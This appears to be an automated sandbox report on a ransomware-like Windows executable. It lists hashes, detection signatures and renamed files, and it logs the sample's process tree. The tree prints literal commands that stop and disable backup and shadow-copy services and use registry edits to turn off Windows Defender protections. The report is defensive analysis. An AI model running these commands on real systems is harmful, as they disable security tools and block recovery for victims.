Resubmissions
13-01-2022 14:14
220113-rj8ymsagb4 1013-01-2022 11:04
220113-m6crhahfgj 1013-01-2022 10:58
220113-m3a4hahef9 10Analysis
-
max time kernel
25s -
max time network
17s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
13-01-2022 10:58
Static task
static1
Behavioral task
behavioral1
Sample
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
Resource
win10-en-20211208
General
-
Target
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
-
Size
2.5MB
-
MD5
8fdfa1997b566f6e086c29e33935dcc5
-
SHA1
178fbe1c8fc1a6e3440215d668797699f94a4bef
-
SHA256
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68
-
SHA512
b185d1080c62f59ff26592321bf2a5cb85556260f34f59726cc9d5aeed1f82a48c710e8decd1212ddc2e4ca371ba83ad3aca6bf34587ddc73cc9c90afec467d5
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2220 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Drops file in Program Files directory 64 IoCs
Processes:
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exedescription ioc process File opened for modification C:\Program Files\7-Zip\readme.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_isRhzZd1dmQ0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\Alphabet.xml cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\auxbase.xml cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\InkWatson.exe.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\System\ado\adovbs.inc cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\7-Zip\Lang\va.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_HqyNaeRYRls0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\InkWatson.exe.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_kor.xml cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Psychedelic.jpg cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsesp.xml cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\keypadbase.xml cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-back-static.png cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Orange Circles.htm cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\mshwLatin.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\mip.exe.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipshrv.xml cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msadcfr.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\7-Zip\Lang\mng2.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_wllXAL4Z8k00.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-split.avi cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\tabskb.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\DVD Maker\Eurosti.TTF cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\mshwLatin.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_jpn.xml cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsnor.xml cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\micaut.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\tipresx.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\7-Zip\Lang\ky.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_L_rm1aJV7ho0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.jpg cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\FlickLearningWizard.exe.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_SelectionSubpicture.png cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Blue_Gradient.jpg cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\micaut.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\System\ado\msado27.tlb cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\7-Zip\Lang\ta.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_PYXqwCqVp4g0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\split.avi cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.jpg cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\7-Zip\Lang\mr.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_Lt4HTXk86wc0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Cave_Drawings.gif cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee100.tlb.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_PVkGWc8BZi00.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\tipresx.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_Kssss1rRWcA0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.htm cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\mip.exe.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\7-Zip\Lang\en.ttt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_APEUeiuiXZI0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_7Sf32L4R0Zw0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\System\msadc\en-US\msaddsr.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msadcer.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\tipresx.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-phonetic.xml cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\rtscom.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\System\ado\msado21.tlb cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\7-Zip\Lang\bn.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_kTY8ud0ZvnY0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\ShadesOfBlue.jpg cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1528 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.execab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exepid process 2252 powershell.exe 2332 powershell.exe 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1800 wevtutil.exe Token: SeBackupPrivilege 1800 wevtutil.exe Token: SeSecurityPrivilege 1084 wevtutil.exe Token: SeBackupPrivilege 1084 wevtutil.exe Token: SeSecurityPrivilege 1920 wevtutil.exe Token: SeBackupPrivilege 1920 wevtutil.exe Token: SeIncreaseQuotaPrivilege 2064 wmic.exe Token: SeSecurityPrivilege 2064 wmic.exe Token: SeTakeOwnershipPrivilege 2064 wmic.exe Token: SeLoadDriverPrivilege 2064 wmic.exe Token: SeSystemProfilePrivilege 2064 wmic.exe Token: SeSystemtimePrivilege 2064 wmic.exe Token: SeProfSingleProcessPrivilege 2064 wmic.exe Token: SeIncBasePriorityPrivilege 2064 wmic.exe Token: SeCreatePagefilePrivilege 2064 wmic.exe Token: SeBackupPrivilege 2064 wmic.exe Token: SeRestorePrivilege 2064 wmic.exe Token: SeShutdownPrivilege 2064 wmic.exe Token: SeDebugPrivilege 2064 wmic.exe Token: SeSystemEnvironmentPrivilege 2064 wmic.exe Token: SeRemoteShutdownPrivilege 2064 wmic.exe Token: SeUndockPrivilege 2064 wmic.exe Token: SeManageVolumePrivilege 2064 wmic.exe Token: 33 2064 wmic.exe Token: 34 2064 wmic.exe Token: 35 2064 wmic.exe Token: SeIncreaseQuotaPrivilege 2112 wmic.exe Token: SeSecurityPrivilege 2112 wmic.exe Token: SeTakeOwnershipPrivilege 2112 wmic.exe Token: SeLoadDriverPrivilege 2112 wmic.exe Token: SeSystemProfilePrivilege 2112 wmic.exe Token: SeSystemtimePrivilege 2112 wmic.exe Token: SeProfSingleProcessPrivilege 2112 wmic.exe Token: SeIncBasePriorityPrivilege 2112 wmic.exe Token: SeCreatePagefilePrivilege 2112 wmic.exe Token: SeBackupPrivilege 2112 wmic.exe Token: SeRestorePrivilege 2112 wmic.exe Token: SeShutdownPrivilege 2112 wmic.exe Token: SeDebugPrivilege 2112 wmic.exe Token: SeSystemEnvironmentPrivilege 2112 wmic.exe Token: SeRemoteShutdownPrivilege 2112 wmic.exe Token: SeUndockPrivilege 2112 wmic.exe Token: SeManageVolumePrivilege 2112 wmic.exe Token: 33 2112 wmic.exe Token: 34 2112 wmic.exe Token: 35 2112 wmic.exe Token: SeIncreaseQuotaPrivilege 2112 wmic.exe Token: SeSecurityPrivilege 2112 wmic.exe Token: SeTakeOwnershipPrivilege 2112 wmic.exe Token: SeLoadDriverPrivilege 2112 wmic.exe Token: SeSystemProfilePrivilege 2112 wmic.exe Token: SeSystemtimePrivilege 2112 wmic.exe Token: SeProfSingleProcessPrivilege 2112 wmic.exe Token: SeIncBasePriorityPrivilege 2112 wmic.exe Token: SeCreatePagefilePrivilege 2112 wmic.exe Token: SeBackupPrivilege 2112 wmic.exe Token: SeRestorePrivilege 2112 wmic.exe Token: SeShutdownPrivilege 2112 wmic.exe Token: SeDebugPrivilege 2112 wmic.exe Token: SeSystemEnvironmentPrivilege 2112 wmic.exe Token: SeRemoteShutdownPrivilege 2112 wmic.exe Token: SeUndockPrivilege 2112 wmic.exe Token: SeManageVolumePrivilege 2112 wmic.exe Token: 33 2112 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1568 wrote to memory of 460 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 460 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 460 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 460 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 460 wrote to memory of 1200 460 net.exe net1.exe PID 460 wrote to memory of 1200 460 net.exe net1.exe PID 460 wrote to memory of 1200 460 net.exe net1.exe PID 460 wrote to memory of 1200 460 net.exe net1.exe PID 1568 wrote to memory of 1412 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 1412 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 1412 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 1412 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1412 wrote to memory of 1392 1412 net.exe net1.exe PID 1412 wrote to memory of 1392 1412 net.exe net1.exe PID 1412 wrote to memory of 1392 1412 net.exe net1.exe PID 1412 wrote to memory of 1392 1412 net.exe net1.exe PID 1568 wrote to memory of 1400 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 1400 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 1400 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 1400 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1400 wrote to memory of 1040 1400 net.exe net1.exe PID 1400 wrote to memory of 1040 1400 net.exe net1.exe PID 1400 wrote to memory of 1040 1400 net.exe net1.exe PID 1400 wrote to memory of 1040 1400 net.exe net1.exe PID 1568 wrote to memory of 688 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 688 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 688 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 688 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 688 wrote to memory of 1072 688 net.exe net1.exe PID 688 wrote to memory of 1072 688 net.exe net1.exe PID 688 wrote to memory of 1072 688 net.exe net1.exe PID 688 wrote to memory of 1072 688 net.exe net1.exe PID 1568 wrote to memory of 720 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 720 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 720 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 720 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 720 wrote to memory of 1456 720 net.exe net1.exe PID 720 wrote to memory of 1456 720 net.exe net1.exe PID 720 wrote to memory of 1456 720 net.exe net1.exe PID 720 wrote to memory of 1456 720 net.exe net1.exe PID 1568 wrote to memory of 1136 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 1136 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 1136 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 1136 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1136 wrote to memory of 1260 1136 net.exe net1.exe PID 1136 wrote to memory of 1260 1136 net.exe net1.exe PID 1136 wrote to memory of 1260 1136 net.exe net1.exe PID 1136 wrote to memory of 1260 1136 net.exe net1.exe PID 1568 wrote to memory of 1820 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 1820 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 1820 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 1820 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1820 wrote to memory of 1660 1820 net.exe net1.exe PID 1820 wrote to memory of 1660 1820 net.exe net1.exe PID 1820 wrote to memory of 1660 1820 net.exe net1.exe PID 1820 wrote to memory of 1660 1820 net.exe net1.exe PID 1568 wrote to memory of 608 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 608 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 608 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1568 wrote to memory of 608 1568 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 608 wrote to memory of 1548 608 net.exe net1.exe PID 608 wrote to memory of 1548 608 net.exe net1.exe PID 608 wrote to memory of 1548 608 net.exe net1.exe PID 608 wrote to memory of 1548 608 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Windows\SysWOW64\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:460 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:1200
-
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1392
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1400 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1040
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1072
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1456
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1260
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1660
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:608 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1548
-
C:\Windows\SysWOW64\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1164
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1844
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1708
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:968
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1064
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵PID:1988
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵PID:888
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2036
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:616
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1072
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1144
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:656
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1248
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:952
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:836
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1716
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:288
-
